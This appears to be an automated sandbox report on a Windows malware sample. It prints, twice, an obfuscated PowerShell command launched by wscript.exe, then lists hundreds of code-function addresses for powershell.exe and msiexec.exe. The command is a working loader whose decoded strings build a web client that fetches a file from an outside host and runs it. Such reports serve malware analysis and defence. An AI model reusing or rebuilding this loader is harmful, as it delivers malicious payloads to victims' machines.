              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Horrify; function Uprouse15($Fastigiate){$Bovate=4;do{$Cataracted+=$Fastigiate[$Bovate];$Bovate+=5;$Preciosities=Format-List} until(!$Fastigiate[$Bovate])$Cataracted}function Testvrktjer($Pericemental){ .($Unplutocratically) ($Pericemental)}$Tagdkker=Uprouse15 ' HusnUdboe Flltregu.,lnsw';$Tagdkker+=Uprouse15 'tersEGrabBNo.aCC.ckLHjteISuprE AndnRenlT';$Rootfast=Uprouse15 'I baM SrsoAwonzU.deiA.rel enslKonta rio/';$Bovatendskudsstning=Uprouse15 'In lTSekulUndesprec1 R c2';$Matricides=' Iko[H isNperie ProT Til.E ems Yane ugtrHjerV ChoIAftecD,taeCoagpChifoServiLevenSkaltEudamPolyAGastNCardaSi kG Ap.eBrutrBuli]Beds: Tan:K losFesteSquiC avpU BomrId oI coptRecoYKnhjpHa eRRa,eo VitT RanO ntCSu sOTerslHepa=opsl$Kns.bDe.oOBankVJow a HygtFo sE KltNEntodAfs,Sre.uKLeftUFormDOranSSquasSorttRealNGalliGiv NMicrG';$Rootfast+=Uprouse15 ' Bri5ad i.Atro0St.k For(hoveWSelviC rcnNin.dLogaoAmniwTri sMetr klatN ArcTGurg Bue1 hri0po d.Ki o0 in;bo d vbniWUntui CounPeri6Capo4Sa e;Va p S,rix wa6Sca 4Mave;peer skar Nurv ko:Tra 1 Cry3over4town.Fors0men.)Edel SumGButieLem c UdskDiaroAlcm/ Van2Ti s0 ,be1,etr0Refl0Gang1Gl t0 Syt1 Sub AlcF SpoiUnder Ab eTy efDobboH.arxInbo/Semi1Si.u3Prem4,oni.M.zu0';$Hydroida=Uprouse15 'SchiuNonfs BibeRiveRMeta-InhaaArtsgUnswegrooN Rect';$Efterabelserne174=Uprouse15 'PolyhKravtStyrtAfrep Sp.sMarx:F re/Regn/ JosoTagdo G drStreiMe.og.anaiSeminIn xaRudslBleru ,edsConceMonadTyro. vivcDagpoPl dm Cre/I.dtln neodemirFo sdPalo/SokkRGenmeSarci ,ramUdmea Pl gFartiArmin agteMoi..BovnpLab rAktim';$Smreplsen78=Uprouse15 ' Apo>';$Unplutocratically=Uprouse15 'StakI CofeSvovX';$Fodboldes='Sygevarsler';$Barakkens='\Sammenbinder.Moe';Testvrktjer (Uprouse15 ' Pri$HjergVeltlmonoOK,rsbUdsea StelAsja:Lo tA.forNTffenG lvU Astl OraO ilISpladHuj = elg$FaguESiniNDetav ase:IdenAHjfoPk.shP Un,DZe,haTommtStilAT an+dyka$Ca bB ysiA angrpremaB nekAntiKSl nEBu.lN unsS');Testvrktjer (Uprouse15 ' gho$WildGEntrLMi eo Saib VenaSmaaLD.lu:Sni.sRadiPPhonI geaSD moeMu iPUnsul T tiIschGE,trtAish1 Fri5 dfo=unod$ Ud EBaudFCongtB,steTaklREnspA Norb Anae HveLUdfas yntEImp R LusNWashEIsil1 Opt7fo,e4Vi a.knalsI,teP EpilB,lliAncytKkke(Tant$SyntSUrinm S.cR Bate Ko,p agbl SeaSRygme Miln Ch.7Triu8Pa i)');Testvrktjer (Uprouse15 $Matricides);$Efterabelserne174=$Spisepligt15[0];$Bodgery=(Uprouse15 ' Inq$Om,igjackLCacoOBlisBUdklA uinLFo.s:Ani uLudvnUdhuMPel,aGastsAcalTPassE inRSp cfS.aau A,kLRegn=ProsnKoekEAmerwAfso-Ho ooPeptBLangJ CryEMat cTeleT Co To lsRec yL geS UnuTSkygesuprM ork. Rip$Fri tcoc a ewaGBrdrDAlulK TafK PosEPne r');Testvrktjer ($Bodgery);Testvrktjer (Uprouse15 'Tyfo$Mou UAr,inIntemBeviaM nisRod,tKimbeTimerUngrf eeuVitalOver.BoflHSeaseM craN.grdTilgeskibrChe.sD el[ Unf$ MurH,hefyBadidNov rM xioJo siReped Ek,aHome]Mic =Dupl$Ls,eRUdsko aaodhaitAnsafSkinaTrefsMoist');$Saaede=Uprouse15 ' For$ BraUTegnn Benmn nva .tesHandt,edre EnsrU frfBestu.xillBjrg.Bai
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Horrify; function Uprouse15($Fastigiate){$Bovate=4;do{$Cataracted+=$Fastigiate[$Bovate];$Bovate+=5;$Preciosities=Format-List} until(!$Fastigiate[$Bovate])$Cataracted}function Testvrktjer($Pericemental){ .($Unplutocratically) ($Pericemental)}$Tagdkker=Uprouse15 ' HusnUdboe Flltregu.,lnsw';$Tagdkker+=Uprouse15 'tersEGrabBNo.aCC.ckLHjteISuprE AndnRenlT';$Rootfast=Uprouse15 'I baM SrsoAwonzU.deiA.rel enslKonta rio/';$Bovatendskudsstning=Uprouse15 'In lTSekulUndesprec1 R c2';$Matricides=' Iko[H isNperie ProT Til.E ems Yane ugtrHjerV ChoIAftecD,taeCoagpChifoServiLevenSkaltEudamPolyAGastNCardaSi kG Ap.eBrutrBuli]Beds: Tan:K losFesteSquiC avpU BomrId oI coptRecoYKnhjpHa eRRa,eo VitT RanO ntCSu sOTerslHepa=opsl$Kns.bDe.oOBankVJow a HygtFo sE KltNEntodAfs,Sre.uKLeftUFormDOranSSquasSorttRealNGalliGiv NMicrG';$Rootfast+=Uprouse15 ' Bri5ad i.Atro0St.k For(hoveWSelviC rcnNin.dLogaoAmniwTri sMetr klatN ArcTGurg Bue1 hri0po d.Ki o0 in;bo d vbniWUntui CounPeri6Capo4Sa e;Va p S,rix wa6Sca 4Mave;peer skar Nurv ko:Tra 1 Cry3over4town.Fors0men.)Edel SumGButieLem c UdskDiaroAlcm/ Van2Ti s0 ,be1,etr0Refl0Gang1Gl t0 Syt1 Sub AlcF SpoiUnder Ab eTy efDobboH.arxInbo/Semi1Si.u3Prem4,oni.M.zu0';$Hydroida=Uprouse15 'SchiuNonfs BibeRiveRMeta-InhaaArtsgUnswegrooN Rect';$Efterabelserne174=Uprouse15 'PolyhKravtStyrtAfrep Sp.sMarx:F re/Regn/ JosoTagdo G drStreiMe.og.anaiSeminIn xaRudslBleru ,edsConceMonadTyro. vivcDagpoPl dm Cre/I.dtln neodemirFo sdPalo/SokkRGenmeSarci ,ramUdmea Pl gFartiArmin agteMoi..BovnpLab rAktim';$Smreplsen78=Uprouse15 ' Apo>';$Unplutocratically=Uprouse15 'StakI CofeSvovX';$Fodboldes='Sygevarsler';$Barakkens='\Sammenbinder.Moe';Testvrktjer (Uprouse15 ' Pri$HjergVeltlmonoOK,rsbUdsea StelAsja:Lo tA.forNTffenG lvU Astl OraO ilISpladHuj = elg$FaguESiniNDetav ase:IdenAHjfoPk.shP Un,DZe,haTommtStilAT an+dyka$Ca bB ysiA angrpremaB nekAntiKSl nEBu.lN unsS');Testvrktjer (Uprouse15 ' gho$WildGEntrLMi eo Saib VenaSmaaLD.lu:Sni.sRadiPPhonI geaSD moeMu iPUnsul T tiIschGE,trtAish1 Fri5 dfo=unod$ Ud EBaudFCongtB,steTaklREnspA Norb Anae HveLUdfas yntEImp R LusNWashEIsil1 Opt7fo,e4Vi a.knalsI,teP EpilB,lliAncytKkke(Tant$SyntSUrinm S.cR Bate Ko,p agbl SeaSRygme Miln Ch.7Triu8Pa i)');Testvrktjer (Uprouse15 $Matricides);$Efterabelserne174=$Spisepligt15[0];$Bodgery=(Uprouse15 ' Inq$Om,igjackLCacoOBlisBUdklA uinLFo.s:Ani uLudvnUdhuMPel,aGastsAcalTPassE inRSp cfS.aau A,kLRegn=ProsnKoekEAmerwAfso-Ho ooPeptBLangJ CryEMat cTeleT Co To lsRec yL geS UnuTSkygesuprM ork. Rip$Fri tcoc a ewaGBrdrDAlulK TafK PosEPne r');Testvrktjer ($Bodgery);Testvrktjer (Uprouse15 'Tyfo$Mou UAr,inIntemBeviaM nisRod,tKimbeTimerUngrf eeuVitalOver.BoflHSeaseM craN.grdTilgeskibrChe.sD el[ Unf$ MurH,hefyBadidNov rM xioJo siReped Ek,aHome]Mic =Dupl$Ls,eRUdsko aaodhaitAnsafSkinaTrefsMoist');$Saaede=Uprouse15 ' For$ BraUTegnn Benmn nva .tesHandt,edre EnsrU frfBestu.xillBjrg.BaiJump to behavior
              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF93686AB263_2_00007FF93686AB26
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF93686B8D23_2_00007FF93686B8D2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF936939EFA3_2_00007FF936939EFA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF93693A70A3_2_00007FF93693A70A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF936932D293_2_00007FF936932D29
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065185015_2_20651850
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065CDC015_2_2065CDC0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20652A9015_2_20652A90
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20651FA815_2_20651FA8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065184115_2_20651841
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065004015_2_20650040
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065944815_2_20659448
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065EC2815_2_2065EC28
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065001315_2_20650013
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065EC1815_2_2065EC18
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20658CC015_2_20658CC0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065F4C815_2_2065F4C8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065F4D815_2_2065F4D8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065F08015_2_2065F080
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065514815_2_20655148
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065F92515_2_2065F925
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065F93015_2_2065F930
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20659D3815_2_20659D38
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065CDAF15_2_2065CDAF
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065D66015_2_2065D660
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065966815_2_20659668
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065D67015_2_2065D670
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065D20815_2_2065D208
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065D21815_2_2065D218
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065DAC715_2_2065DAC7
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065DAC815_2_2065DAC8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065E37115_2_2065E371
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065E37815_2_2065E378
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065DF2015_2_2065DF20
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20650B2015_2_20650B20
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20650B3015_2_20650B30
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065DF1115_2_2065DF11
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065E7CF15_2_2065E7CF
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2065E7D015_2_2065E7D0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20651FA315_2_20651FA3
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20677D7815_2_20677D78
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20678B5815_2_20678B58
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067772015_2_20677720
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067AB8015_2_2067AB80
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067346015_2_20673460
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067C26915_2_2067C269
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067F06815_2_2067F068
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20674A6815_2_20674A68
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20676E7215_2_20676E72
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20676E7015_2_20676E70
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20674A7815_2_20674A78
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067C27815_2_2067C278
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067947815_2_20679478
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067A24115_2_2067A241
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067004015_2_20670040
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067D04015_2_2067D040
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20671A4015_2_20671A40
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20671A5015_2_20671A50
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067A25015_2_2067A250
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067F05815_2_2067F058
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067462015_2_20674620
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067603015_2_20676030
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067D03015_2_2067D030
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067300815_2_20673008
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067DE0815_2_2067DE08
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067B00815_2_2067B008
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20676A1A15_2_20676A1A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20676A1815_2_20676A18
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067B01815_2_2067B018
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067A6E815_2_2067A6E8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067F4F115_2_2067F4F1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_206708F015_2_206708F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_206722F015_2_206722F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_206772CA15_2_206772CA
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_206772C815_2_206772C8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067D4C815_2_2067D4C8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20674ED015_2_20674ED0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067D4D815_2_2067D4D8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067A6D815_2_2067A6D8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067E2A015_2_2067E2A0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067B4A015_2_2067B4A0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20671EA815_2_20671EA8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067B4B015_2_2067B4B0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067948815_2_20679488
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067E29115_2_2067E291
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067049815_2_20670498
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20671E9815_2_20671E98
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067D96115_2_2067D961
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067577215_2_20675772
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067AB7115_2_2067AB71
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067D97015_2_2067D970
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20670D4715_2_20670D47
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20678B4915_2_20678B49
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20670D4815_2_20670D48
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067B94815_2_2067B948
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067274815_2_20672748
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067F94815_2_2067F948
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067275815_2_20672758
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067F95815_2_2067F958
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067992015_2_20679920
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067532815_2_20675328
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067E72815_2_2067E728
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067E73815_2_2067E738
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067B93815_2_2067B938
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067C70515_2_2067C705
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067230015_2_20672300
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067F50015_2_2067F500
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067771115_2_20677711
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067C71015_2_2067C710
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067991015_2_20679910
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067531815_2_20675318
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067BDE015_2_2067BDE0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20678FE015_2_20678FE0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_206715F715_2_206715F7
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20678FF015_2_20678FF0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067DDF915_2_2067DDF9
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_206715F815_2_206715F8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20672FF815_2_20672FF8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067EBC115_2_2067EBC1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_206765C015_2_206765C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20675BCC15_2_20675BCC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_206741CA15_2_206741CA
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_206741C815_2_206741C8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067BDD415_2_2067BDD4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067EBD015_2_2067EBD0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20675BD815_2_20675BD8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20672BA115_2_20672BA1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_206711A015_2_206711A0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_206765AF15_2_206765AF
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20679DAC15_2_20679DAC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067CBA815_2_2067CBA8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20672BB015_2_20672BB0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20679DB815_2_20679DB8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067578015_2_20675780
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067119015_2_20671190
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2067CB9915_2_2067CB99
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069434815_2_20694348
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069481015_2_20694810
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20693BF815_2_20693BF8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069F8F815_2_2069F8F8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069206815_2_20692068
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069566815_2_20695668
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069EF6815_2_2069EF68
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069376015_2_20693760
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069C46015_2_2069C460
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069096015_2_20690960
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069816015_2_20698160
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069AC6715_2_2069AC67
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069AC7815_2_2069AC78
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069D77115_2_2069D771
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069097015_2_20690970
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069817015_2_20698170
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069697715_2_20696977
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069DC4815_2_2069DC48
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069994815_2_20699948
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069004015_2_20690040
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069B14015_2_2069B140
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069995815_2_20699958
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069205815_2_20692058
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069565815_2_20695658
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069C45815_2_2069C458
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069EF5815_2_2069EF58
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20696E5015_2_20696E50
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069375215_2_20693752
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069172915_2_20691729
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069862915_2_20698629
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069C92815_2_2069C928
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069B12F15_2_2069B12F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20699E2015_2_20699E20
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20695B2015_2_20695B20
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20692E2215_2_20692E22
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069C92415_2_2069C924
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069433915_2_20694339
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069173815_2_20691738
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069863815_2_20698638
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069DC3815_2_2069DC38
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20696E3F15_2_20696E3F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20692E3015_2_20692E30
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20695B3015_2_20695B30
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069F43015_2_2069F430
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20690E0815_2_20690E08
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069B60815_2_2069B608
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069250015_2_20692500
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20698B0015_2_20698B00
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069E10215_2_2069E102
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069730715_2_20697307
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069731815_2_20697318
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069F41F15_2_2069F41F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069001115_2_20690011
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069E11015_2_2069E110
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20699E1015_2_20699E10
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069A2E815_2_2069A2E8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20693BE815_2_20693BE8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069F8E815_2_2069F8E8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20695FED15_2_20695FED
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20698AEF15_2_20698AEF
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_206977E015_2_206977E0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20695FF815_2_20695FF8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20690DF815_2_20690DF8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069B5F815_2_2069B5F8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_206947FF15_2_206947FF
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069CDF015_2_2069CDF0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_206924F015_2_206924F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069E5C915_2_2069E5C9
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_206932C815_2_206932C8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20698FC815_2_20698FC8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_206904C815_2_206904C8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20694CC815_2_20694CC8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_206964C015_2_206964C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20691BC015_2_20691BC0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069BAC015_2_2069BAC0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20698FC415_2_20698FC4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_206904D815_2_206904D8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20694CD815_2_20694CD8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069E5D815_2_2069E5D8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069A2D815_2_2069A2D8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069CDDF15_2_2069CDDF
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20691BD015_2_20691BD0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069BAD015_2_2069BAD0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_206977D015_2_206977D0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20697CA815_2_20697CA8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_2069D2A815_2_2069D2A8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_206964AF15_2_206964AF
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_206912A015_2_206912A0
